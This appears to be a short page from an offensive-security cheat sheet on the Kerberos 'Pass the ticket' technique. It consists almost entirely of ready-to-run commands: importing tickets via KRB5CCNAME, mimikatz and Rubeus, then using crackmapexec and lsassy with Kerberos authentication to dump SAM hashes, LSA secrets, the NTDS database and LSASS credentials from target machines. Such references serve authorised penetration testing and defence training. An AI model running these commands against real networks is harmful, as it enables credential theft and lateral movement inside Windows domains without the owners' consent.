Pass the ticket

A ticket can then be used to authenticate to a system using Kerberos without knowing any password. This is called Pass the ticket.

Once a ticket is obtained/created, it needs to be referenced in the KRB5CCNAME environment variable for it to be used by others tools.

Import tickets


export KRB5CCNAME=$path_to_ticket.ccache


# With mimikatz

# use a .kirbi file
kerberos::ptt $ticket_kirbi_file

# use a .ccache file
kerberos::ptt $ticket_ccache_file

# With Rubeus
Rubeus.exe ptt /ticket:"base64 | file.kirbi"

Pass the ticket


# dump hashes and LSA secrets from a machine. -k $TARGET

# dump credentials from specific locations 
crackmapexec smb $TARGETS -k --sam
crackmapexec smb $TARGETS -k --lsa
crackmapexec smb $TARGETS -k --ntds

# With Lsassy, dump credentails. They use different methods. 
crackmapexec smb $TARGETS -k -M lsassy
crackmapexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
lsassy -k $TARGETS

Last updated